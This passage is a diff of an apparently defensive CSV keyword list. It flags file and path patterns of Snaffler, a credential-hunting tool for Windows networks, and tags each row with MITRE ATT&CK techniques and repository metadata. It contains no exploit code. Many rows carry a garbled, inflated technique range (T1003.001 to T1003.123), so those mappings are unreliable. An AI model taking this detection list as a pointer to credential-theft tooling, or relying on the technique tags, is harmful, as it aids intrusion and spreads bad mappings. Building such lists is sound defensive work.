T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore/Classifiers*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore/Concurrency*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore/Config*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore/ShareFind*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore/TreeWalk*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*Snaffler.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*Snaffler.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*snaffler.exe*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*snaffler.exe*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*snaffler.log*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*Snaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*Snaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnafflerMessage.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnafflerMessageType.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCon/Snaffler*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/ActiveDirectory*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/Classifiers*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/Concurrency*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - 